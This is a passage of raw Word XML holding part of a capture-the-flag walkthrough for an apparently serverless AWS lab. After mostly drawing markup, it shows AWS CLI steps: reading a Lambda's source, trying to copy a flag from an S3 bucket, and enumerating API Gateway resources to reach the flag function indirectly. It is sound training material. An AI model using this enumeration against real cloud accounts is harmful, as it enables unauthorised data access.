            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77D414E7" wp14:editId="3DB995D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3378240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2955765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2282040" cy="9360"/>
                <wp:effectExtent l="127000" t="215900" r="118745" b="207010"/>
                <wp:wrapNone/>
                <wp:docPr id="210" name="Ink 210"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId18">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2282040" cy="9360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7D6111A4" id="Ink 210" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:258.9pt;margin-top:218.6pt;width:193.9pt;height:29.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">
                <v:imagedata r:id="rId19" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BA83099" wp14:editId="3344CA97">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>92880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3004725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3167280" cy="58320"/>
                <wp:effectExtent l="127000" t="215900" r="147955" b="208915"/>
                <wp:wrapNone/>
                <wp:docPr id="209" name="Ink 209"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId20">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="3167280" cy="58320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="30BD0958" id="Ink 209" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:.25pt;margin-top:222.45pt;width:263.6pt;height:32.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">
                <v:imagedata r:id="rId21" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7209149B" wp14:editId="0277A687">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2605320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3203805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2953440" cy="93600"/>
                <wp:effectExtent l="127000" t="215900" r="120015" b="211455"/>
                <wp:wrapNone/>
                <wp:docPr id="208" name="Ink 208"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId22">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2953440" cy="93600"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7FD9286D" id="Ink 208" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:198.05pt;margin-top:238.1pt;width:246.7pt;height:3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">
                <v:imagedata r:id="rId23" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="118F5916" wp14:editId="15E41F92">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>82800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3244125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2475360" cy="73800"/>
                <wp:effectExtent l="127000" t="215900" r="115570" b="205740"/>
                <wp:wrapNone/>
                <wp:docPr id="207" name="Ink 207"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId24">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2475360" cy="73800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1E9E6B16" id="Ink 207" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.55pt;margin-top:241.3pt;width:209.05pt;height:34.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">
                <v:imagedata r:id="rId25" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E4CD256" wp14:editId="0589D4BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4886640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2671365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="790920" cy="9720"/>
                <wp:effectExtent l="127000" t="215900" r="123825" b="206375"/>
                <wp:wrapNone/>
                <wp:docPr id="206" name="Ink 206"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId26">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="790920" cy="9720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="67A2AC90" id="Ink 206" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:377.65pt;margin-top:196.2pt;width:76.45pt;height:29.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">
                <v:imagedata r:id="rId27" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F23CBE6" wp14:editId="06B887E4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>114840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2614125</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4897800" cy="99360"/>
                <wp:effectExtent l="127000" t="215900" r="144145" b="205740"/>
                <wp:wrapNone/>
                <wp:docPr id="205" name="Ink 205"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId28">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4897800" cy="99360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="38867DCE" id="Ink 205" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:2pt;margin-top:191.7pt;width:399.8pt;height:36.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">
                <v:imagedata r:id="rId29"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page5image66213360" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DE9E468" wp14:editId="3072FF34">
            <wp:extent cx="5731510" cy="3559175"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="9525"/>
            <wp:docPr id="170" name="Picture 170" descr="page5image6621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5image662133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559175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518847D" w14:textId="61112AC2" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="009B3034">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">The Link to download the source code is present in the Location Attribute of Code section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB5059" w14:textId="77777777" w:rsidR="009B3034" w:rsidRPr="0094232C" w:rsidRDefault="009B3034" w:rsidP="0094232C"/>
    <w:p w14:paraId="2121B076" w14:textId="53CC04AD" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00683D39">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 4: ​Download the source archive</w:t>
      </w:r>
      <w:r w:rsidR="006F2761">
        <w:t xml:space="preserve"> from above URL location</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B7377" w14:textId="0FFBEACA" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00683D39">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 5: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DA39F6" w14:textId="1C56E097" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="00683D39">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 6: ​View lambda_function.py file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153510F2" w14:textId="1F8245F0" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page7image66213152" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353DE757" wp14:editId="243D677F">
            <wp:extent cx="5731510" cy="1913255"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="17145"/>
            <wp:docPr id="163" name="Picture 163" descr="page7image6621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7image662131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913255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885E5DB" w14:textId="412049D2" w:rsidR="006F2761" w:rsidRDefault="00E80E5B" w:rsidP="00E80E5B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> lambda function fetches the second flag from the s3 bucket "serverless-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">-flags". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBCD0FD" w14:textId="77777777" w:rsidR="00E80E5B" w:rsidRPr="0094232C" w:rsidRDefault="00E80E5B" w:rsidP="00E80E5B"/>
    <w:p w14:paraId="045F5520" w14:textId="2D990E1A" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="006F2761">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 7: ​Check </w:t>
      </w:r>
      <w:r w:rsidR="006F2761">
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> current user can interact with the S3 bucket and retrieve the flag directly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D58CA4" w14:textId="06816F2F" w:rsidR="009E55A4" w:rsidRPr="009E55A4" w:rsidRDefault="0094232C" w:rsidP="006F2761">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s3 cp s3://serverless-ctf-flags/ServerlessFLAG2 ./ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A855C00" w14:textId="74C9C0B3" w:rsidR="003421DF" w:rsidRDefault="003421DF" w:rsidP="009E55A4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF29A58" w14:textId="481823F8" w:rsidR="007A41C1" w:rsidRDefault="007A41C1" w:rsidP="009E55A4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page7image66215648" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6128C0A0" wp14:editId="7372AAAA">
            <wp:extent cx="5731510" cy="583565"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="13335"/>
            <wp:docPr id="213" name="Picture 213" descr="page7image6621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page7image662156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583565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB47E9" w14:textId="77777777" w:rsidR="007A41C1" w:rsidRDefault="009E55A4" w:rsidP="007A41C1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>The current user does not have the permission to read from the bucket directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46109069" w14:textId="4EBC1EED" w:rsidR="0094232C" w:rsidRPr="007A41C1" w:rsidRDefault="0094232C" w:rsidP="007A41C1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 8: ​List the API gateways and check whether any of them invoke my-serverless-flag function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480D3C8" w14:textId="77777777" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="009E55A4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>apis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4945A5" w14:textId="25F8C9FC" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="38D0F372" w14:textId="598A6ADD" w:rsidR="009E55A4" w:rsidRDefault="009E55A4" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02AA4329" wp14:editId="4A8BDDA8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>924480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>778611</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2183400" cy="29880"/>
                <wp:effectExtent l="127000" t="215900" r="128270" b="211455"/>
                <wp:wrapNone/>
                <wp:docPr id="218" name="Ink 218"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId33">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2183400" cy="29880"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="662106BA" id="Ink 218" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:65.7pt;margin-top:47.15pt;width:186.05pt;height:30.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">
                <v:imagedata r:id="rId34"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page8image66216688" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C697E1" wp14:editId="72DB0965">
            <wp:extent cx="5731510" cy="4779645"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8255"/>
            <wp:docPr id="159" name="Picture 159" descr="page8image6621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8image662166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779645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA27840" w14:textId="061D1B64" w:rsidR="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">There are 4 rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>apis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">, the rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> with id "43iqo53xr7" might be able to invoke the "my-serverless-flag" function (based on name and description) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B07810" w14:textId="77777777" w:rsidR="009E55A4" w:rsidRPr="0094232C" w:rsidRDefault="009E55A4" w:rsidP="0094232C"/>
    <w:p w14:paraId="4991330C" w14:textId="663AA5CE" w:rsidR="009E55A4" w:rsidRDefault="0094232C" w:rsidP="009E55A4">
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 9: ​Get the resources of the rest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> with id "43iqo53xr7". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC06C4" w14:textId="72C34DEB" w:rsidR="0094232C" w:rsidRPr="009E55A4" w:rsidRDefault="0094232C" w:rsidP="009E55A4">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>Command: ​aws apigateway get-resources --rest-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E55A4">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve">-id 43iqo53xr7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC6D09" w14:textId="7975A37C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="4E7FD852" w14:textId="58EDEC52" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="009E55A4" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A8FE34D" wp14:editId="742CE138">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>979200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>693250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1174680" cy="18720"/>
                <wp:effectExtent l="88900" t="139700" r="83185" b="133985"/>
                <wp:wrapNone/>
                <wp:docPr id="219" name="Ink 219"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId36">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1174680" cy="18720"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
